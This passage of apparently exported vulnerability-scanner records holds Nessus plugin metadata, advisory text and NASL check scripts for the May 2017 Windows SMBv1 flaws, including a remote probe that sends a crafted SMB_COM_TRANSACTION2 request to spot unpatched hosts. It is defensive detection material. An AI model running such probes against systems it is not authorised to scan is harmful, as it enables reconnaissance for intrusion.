value:\"http://www.nessus.org/u?c88efefa\");\n # https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0275\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?695bf5cc\");\n # https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0276\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?459a1e8c\");\n # https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0277\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?ea45bbc5\");\n # https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0278\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?4195776a\");\n # https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0279\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?fbf092cf\");\n # https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0280\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?8c0cc566\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the applicable security update for your Windows version :\n\n - Windows Server 2008 : KB4018466\n - Windows 7 : KB4019264\n - Windows Server 2008 R2 : KB4019264\n - Windows Server 2012 : KB4019216\n - Windows 8.1 / RT 8.1. 
: KB4019215\n - Windows Server 2012 R2 : KB4019215\n - Windows 10 : KB4019474\n - Windows 10 Version 1511 : KB4019473\n - Windows 10 Version 1607 : KB4019472\n - Windows 10 Version 1703 : KB4016871\n - Windows Server 2016 : KB4019472\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-0272\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/05/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/05/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/26\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"os_fingerprint.nasl\", \"smb_v1_enabled_remote.nasl\");\n script_require_keys(\"Host/OS\", \"SMB/SMBv1_is_supported\");\n script_require_ports(139, 445);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"byte_func.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"smb_func.inc\");\n\nfunction smb_get_error_code (data)\n{\n local_var header, flags2, code;\n\n # Some checks in the header first\n header = get_smb_header (smbblob:data);\n if (!header)\n return NULL;\n\n flags2 = get_header_flags2 (header:header);\n if (flags2 & SMB_FLAGS2_32BIT_STATUS)\n {\n code = get_header_nt_error_code (header:header);\n }\n else\n {\n code = get_header_dos_error_code (header:header);\n }\n\n return code;\n}\n\nfunction my_smb_trans2(setup, param, plen, data, max_pcount, max_dcount, max_scount)\n{\n local_var header, parameters, dat, packet, ret, pad1, p_offset, d_offset, dlen, slen, pad2; \n\n pad1 = pad2 = NULL;\n\n header = smb_header (Command: SMB_COM_TRANSACTION2,\n Status: nt_status (Status: STATUS_SUCCESS));\n\n p_offset = 32 + 1 + 28 + strlen(setup) + 2 + 1;\n\n # Parameter is aligned to 4 byte\n pad1 = crap(data:'\\x00', length: (4 - p_offset % 4) % 4);\n p_offset += strlen(pad1);\n\n # Data is aligned to 4 byte\n d_offset = p_offset + strlen (param);\n pad2 = crap(data:'\\x00', length: (4 - d_offset % 4) % 4);\n d_offset += strlen(pad2);\n\n if(isnull(plen)) plen = strlen(param); \n dlen = strlen(data);\n slen = strlen(setup);\n\n if(slen % 2) return NULL; \n\n if(isnull(max_pcount)) max_pcount = 0x1000;\n if(isnull(max_dcount)) max_dcount = 0x1000;\n if(isnull(max_scount)) max_scount = 0x20;\n\n parameters = \n raw_word (w:plen) + # total parameter count\n\t raw_word (w:dlen) + # total data count\n\t raw_word (w:max_pcount) + # Max parameter count\n\t raw_word (w:max_dcount) + # Max data count\n\t raw_byte (b:max_scount) + # Max setup count\n raw_byte (b:0) + # Reserved1\n\t 
raw_word (w:0) + # Flags\n\t raw_dword (d:0) + # Timeout\n\t raw_word (w:0) + # Reserved2\n\t raw_word (w:plen) + # Parameter count\n\t raw_word (w:p_offset) + # Parameter offset\n\t raw_word (w:dlen) + # Data count\n\t raw_word (w:d_offset) + # Data offset\n\t raw_byte (b:slen/2) + # Setup count\n\t raw_byte (b:0); # Reserved3\n\n parameters += setup;\n\n parameters = smb_parameters (data:parameters);\n\n dat = '\\x00' + # Name \n pad1 +\n param +\n pad2 +\n data;\n\n dat = smb_data (data:dat);\n\n packet = netbios_packet (header:header, parameters:parameters, data:dat);\n\n ret = smb_sendrecv (data:packet);\n if (!ret)\n return NULL;\n\n return smb_get_error_code (data:ret);\n}\n\n\n#\n# MAIN\n#\n\n# Make sure it's Windows \nos = get_kb_item_or_exit(\"Host/OS\");\nif (\"Windows\" >!< os)\n audit(AUDIT_HOST_NOT, \"Windows\"); \n \n# Make sure SMBv1 is enabled\nif (! get_kb_item(\"SMB/SMBv1_is_supported\"))\n exit(0, \"SMB version 1 does not appear to be enabled on the remote host.\"); \n\nif (!smb_session_init(smb2:FALSE)) audit(AUDIT_FN_FAIL, 'smb_session_init');\n\nr = NetUseAdd(share:\"IPC$\");\nif (r != 1)\n{\n exit(1, 'Failed to connect to the IPC$ share anonymously.');\n}\n\nsetup = raw_word(w:0x06); \nparam = raw_word(w:0xbeef) + raw_dword(d:0); \nstatus = my_smb_trans2(setup: setup, data: NULL, param:param);\nNetUseDel();\n\nif(! isnull(status))\n{\n if(status == 0x00000001) \n {\n audit(AUDIT_HOST_NOT , \"affected\"); \n }\n else if (status == STATUS_NOT_SUPPORTED)\n {\n port = kb_smb_transport();\n security_report_v4(port: port, severity: SECURITY_HOLE);\n }\n else\n {\n port = kb_smb_transport();\n status = \"0x\" + toupper(hexstr(mkdword(status)));\n audit(AUDIT_RESP_BAD, port, \"an SMB_COM_TRANSACTION2 request. Status code: \" + status);\n }\n}\nelse\n{\n exit(1, \"Failed to get response status for an SMB_COM_TRANSACTION2 request. 
Possibly 'NullSessionPipes' and 'NullSessionShares' are not configured on the server.\"); \n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-30T17:09:27", "description": "The remote Windows host is missing security update 4019263 or cumulative update 4019264. It is, therefore, affected by multiple vulnerabilities :\n\n - A denial of service vulnerability exists in the Windows DNS server when it's configured to answer version queries. An unauthenticated, remote attacker can exploit this, via a malicious DNS query, to cause the DNS server to become nonresponsive. (CVE-2017-0171)\n\n - An information disclosure vulnerability exists in the Windows kernel due to improper handling of objects in memory. A local attacker can exploit this, via a specially crafted application, to disclose sensitive information. (CVE-2017-0175)\n\n - An elevation of privilege vulnerability exists in the Windows COM Aggregate Marshaler due to an unspecified flaw. A local attacker can exploit this, via a specially crafted application, to execute arbitrary code with elevated privileges. (CVE-2017-0213)\n\n - An elevation of privilege vulnerability exists in Windows due to improper validation of user-supplied input when loading type libraries. A local attacker can exploit this, via a specially crafted application, to gain elevated privileges. (CVE-2017-0214)\n\n - An information disclosure vulnerability exists in the Windows kernel due to improper handling of objects in memory. A local attacker can exploit this, via a specially crafted application, to disclose sensitive information. (CVE-2017-0220)\n\n - A remote code execution vulnerability exists in Microsoft Internet Explorer due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to execute arbitrary code in the context of the current user. 
(CVE-2017-0222)\n\n - A spoofing vulnerability exists in Microsoft browsers due to improper rendering of the SmartScreen filter. An unauthenticated, remote attacker can exploit this, via a specially crafted URL, to redirect users to a malicious website that appears to be a legitimate website.\n (CVE-2017-0231)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0267)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0268)\n\n - A denial of service vulnerability exists in Microsoft Server Message Block (SMB) when handling a specially crafted request to the server. An unauthenticated, remote attacker can exploit this, via a crafted SMB request, to cause the system to stop responding.\n (CVE-2017-0269)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0270)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0271)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. 
An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0272)\n\n - A denial of service vulnerability exists in Microsoft Server Message Block (SMB) when handling a specially crafted request to the server. An unauthenticated, remote attacker can exploit this, via a crafted SMB request, to cause the system to stop responding.\n (CVE-2017-0273)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0274)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0275)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0276)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0277)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0278)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. 
An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0279)\n\n - A denial of service vulnerability exists in Microsoft Server Message Block (SMB) when handling a specially crafted request to the server. An unauthenticated, remote attacker can exploit this, via a crafted SMB request, to cause the system to stop responding.\n (CVE-2017-0280)\n\n - An information disclosure vulnerability exists in the GDI component due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to open a specially crafted document or visit a specially crafted website, to disclose the contents of memory. (CVE-2017-8552)", "cvss3": {"score": 8.1, "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-05-09T00:00:00", "type": "nessus", "title": "Windows 7 and Windows Server 2008 R2 May 2017 Security Updates", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-0171", "CVE-2017-0175", "CVE-2017-0213", "CVE-2017-0214", "CVE-2017-0220", "CVE-2017-0222", "CVE-2017-0231", "CVE-2017-0267", "CVE-2017-0268", "CVE-2017-0269", "CVE-2017-0270", "CVE-2017-0271", "CVE-2017-0272", "CVE-2017-0273", "CVE-2017-0274", "CVE-2017-0275", "CVE-2017-0276", "CVE-2017-0277", "CVE-2017-0278", "CVE-2017-0279", "CVE-2017-0280", "CVE-2017-8552"], "modified": "2022-03-29T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS17_MAY_4019264.NASL", "href": "https://www.tenable.com/plugins/nessus/100058", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(100058);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/03/29\");\n\n script_cve_id(\n \"CVE-2017-0171\",\n \"CVE-2017-0175\",\n \"CVE-2017-0213\",\n \"CVE-2017-0214\",\n \"CVE-2017-0220\",\n 
\"CVE-2017-0222\",\n \"CVE-2017-0231\",\n \"CVE-2017-0267\",\n \"CVE-2017-0268\",\n \"CVE-2017-0269\",\n \"CVE-2017-0270\",\n \"CVE-2017-0271\",\n \"CVE-2017-0272\",\n \"CVE-2017-0273\",\n \"CVE-2017-0274\",\n \"CVE-2017-0275\",\n \"CVE-2017-0276\",\n \"CVE-2017-0277\",\n \"CVE-2017-0278\",\n \"CVE-2017-0279\",\n \"CVE-2017-0280\",\n \"CVE-2017-8552\"\n );\n script_bugtraq_id(\n 98097,\n 98102,\n 98103,\n 98110,\n 98111,\n 98127,\n 98173,\n 98259,\n 98260,\n 98261,\n 98263,\n 98264,\n 98265,\n 98266,\n 98267,\n 98268,\n 98270,\n 98271,\n 98272,\n 98273,\n 98274\n );\n script_xref(name:\"MSKB\", value:\"4019263\");\n script_xref(name:\"MSKB\", value:\"4019264\");\n script_xref(name:\"MSFT\", value:\"MS17-4019263\");\n script_xref(name:\"MSFT\", value:\"MS17-4019264\");\n script_xref(name:\"IAVA\", value:\"2017-A-0148\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/08/25\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/18\");\n\n script_name(english:\"Windows 7 and Windows Server 2008 R2 May 2017 Security Updates\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4019263\nor cumulative update 4019264. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A denial of service vulnerability exists in the Windows\n DNS server when it's configured to answer version\n queries. An unauthenticated, remote attacker can exploit\n this, via a malicious DNS query, to cause the DNS server\n to become nonresponsive. (CVE-2017-0171)\n\n - An information disclosure vulnerability exists in the\n Windows kernel due to improper handling of objects in\n memory. A local attacker can exploit this, via a\n specially crafted application, to disclose sensitive\n information. 
(CVE-2017-0175)\n\n - An elevation of privilege vulnerability exists in the\n Windows COM Aggregate Marshaler due to an unspecified\n flaw. A local attacker can exploit this, via a specially\n crafted application, to execute arbitrary code with\n elevated privileges. (CVE-2017-0213)\n\n - An elevation of privilege vulnerability exists in\n Windows due to improper validation of user-supplied\n input when loading type libraries. A local attacker can\n exploit this, via a specially crafted application, to\n gain elevated privileges. (CVE-2017-0214)\n\n - An information disclosure vulnerability exists in the\n Windows kernel due to improper handling of objects in\n memory. A local attacker can exploit this, via a\n specially crafted application, to disclose sensitive\n information. (CVE-2017-0220)\n\n - A remote code execution vulnerability exists in\n Microsoft Internet Explorer due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, by convincing a user to visit a\n specially crafted website, to execute arbitrary code in\n the context of the current user. (CVE-2017-0222)\n\n - A spoofing vulnerability exists in Microsoft browsers\n due to improper rendering of the SmartScreen filter. An\n unauthenticated, remote attacker can exploit this, via a\n specially crafted URL, to redirect users to a malicious\n website that appears to be a legitimate website.\n (CVE-2017-0231)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0267)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. 
An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0268)\n\n - A denial of service vulnerability exists in Microsoft\n Server Message Block (SMB) when handling a specially\n crafted request to the server. An unauthenticated,\n remote attacker can exploit this, via a crafted SMB\n request, to cause the system to stop responding.\n (CVE-2017-0269)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0270)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0271)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0272)\n\n - A denial of service vulnerability exists in Microsoft\n Server Message Block (SMB) when handling a specially\n crafted request to the server. An unauthenticated,\n remote attacker can exploit this, via a crafted SMB\n request, to cause the system to stop responding.\n (CVE-2017-0273)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. 
An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0274)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0275)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0276)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0277)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0278)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0279)\n\n - A denial of service vulnerability exists in Microsoft\n Server Message Block (SMB) when handling a specially\n crafted request to the server. 
An unauthenticated,\n remote attacker can exploit this, via a crafted SMB\n request, to cause the system to stop responding.\n (CVE-2017-0280)\n\n - An information disclosure vulnerability exists in the\n GDI component due to improper handling of objects in\n memory. An unauthenticated, remote attacker can exploit\n this, by convincing a user to open a specially crafted\n document or visit a specially crafted website, to\n disclose the contents of memory. (CVE-2017-8552)\");\n # https://support.microsoft.com/en-us/help/4019264/windows-7-update-kb4019264\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?89dd1a9e\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4019263 or Cumulative update KB4019264.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-0272\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/05/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/05/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n 
script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\n## NB: Microsoft\nbulletin = 'MS17-05';\nkbs = make_list(\"4019264\", \"4019263\");\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\n# KB only applies to Windows 7 / 2008 R2, SP1\nif (hotfix_check_sp_range(win7:'1') <= 0)\n audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n # Windows 7 / 2008 R2\n smb_check_rollup(os:\"6.1\", sp:1, rollup_date:\"05_2017\", bulletin:bulletin, rollup_kb_list:[4019264, 4019263])\n)\n{\n replace_kb_item(name:\"SMB/Missing/\"+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-30T17:10:50", "description": "The remote Windows host is missing security update 4019214 or cumulative update 4019216. 
It is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in the Windows COM Aggregate Marshaler due to an unspecified flaw. A local attacker can exploit this, via a specially crafted application, to execute arbitrary code with elevated privileges. (CVE-2017-0213)\n\n - An elevation of privilege vulnerability exists in Windows due to improper validation of user-supplied input when loading type libraries. A local attacker can exploit this, via a specially crafted application, to gain elevated privileges. (CVE-2017-0214)\n\n - An information disclosure vulnerability exists in the Windows kernel due to improper handling of objects in memory. A local attacker can exploit this, via a specially crafted application, to disclose sensitive information. (CVE-2017-0220)\n\n - A remote code execution vulnerability exists in Microsoft Internet Explorer due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to execute arbitrary code in the context of the current user. (CVE-2017-0222)\n\n - A remote code execution vulnerability exists in Microsoft Internet Explorer due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to execute arbitrary code in the context of the current user. (CVE-2017-0226)\n\n - A remote code execution vulnerability exists in Microsoft browsers in the JavaScript scripting engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0238)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. 
An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0267)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0268)\n\n - A denial of service vulnerability exists in Microsoft Server Message Block (SMB) when handling a specially crafted request to the server. An unauthenticated, remote attacker can exploit this, via a crafted SMB request, to cause the system to stop responding.\n (CVE-2017-0269)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0270)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0271)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0272)\n\n - A denial of service vulnerability exists in Microsoft Server Message Block (SMB) when handling a specially crafted request to the server. An unauthenticated, remote attacker can exploit this, via a crafted SMB request, to cause the system to stop responding.\n (CVE-2017-0273)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. 
An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0274)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0275)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0276)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0277)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0278)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0279)\n\n - A denial of service vulnerability exists in Microsoft Server Message Block (SMB) when handling a specially crafted request to the server. 
An unauthenticated, remote attacker can exploit this, via a crafted SMB request, to cause the system to stop responding.\n (CVE-2017-0280)", "cvss3": {"score": 8.1, "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-05-09T00:00:00", "type": "nessus", "title": "Windows Server 2012 May 2017 Security Updates", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-0213", "CVE-2017-0214", "CVE-2017-0220", "CVE-2017-0222", "CVE-2017-0226", "CVE-2017-0238", "CVE-2017-0267", "CVE-2017-0268", "CVE-2017-0269", "CVE-2017-0270", "CVE-2017-0271", "CVE-2017-0272", "CVE-2017-0273", "CVE-2017-0274", "CVE-2017-0275", "CVE-2017-0276", "CVE-2017-0277", "CVE-2017-0278", "CVE-2017-0279", "CVE-2017-0280"], "modified": "2022-03-29T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS17-MAY_4019214.NASL", "href": "https://www.tenable.com/plugins/nessus/100054", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(100054);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/03/29\");\n\n script_cve_id(\n \"CVE-2017-0213\",\n \"CVE-2017-0214\",\n \"CVE-2017-0220\",\n \"CVE-2017-0222\",\n \"CVE-2017-0226\",\n \"CVE-2017-0238\",\n \"CVE-2017-0267\",\n \"CVE-2017-0268\",\n \"CVE-2017-0269\",\n \"CVE-2017-0270\",\n \"CVE-2017-0271\",\n \"CVE-2017-0272\",\n \"CVE-2017-0273\",\n \"CVE-2017-0274\",\n \"CVE-2017-0275\",\n \"CVE-2017-0276\",\n \"CVE-2017-0277\",\n \"CVE-2017-0278\",\n \"CVE-2017-0279\",\n \"CVE-2017-0280\"\n );\n script_bugtraq_id(\n 98102,\n 98103,\n 98111,\n 98127,\n 98139,\n 98237,\n 98259,\n 98260,\n 98261,\n 98263,\n 98264,\n 98265,\n 98266,\n 98267,\n 98268,\n 98270,\n 98271,\n 98272,\n 98273,\n 98274\n );\n script_xref(name:\"MSKB\", value:\"4019214\");\n script_xref(name:\"MSKB\", value:\"4019216\");\n script_xref(name:\"MSFT\", 
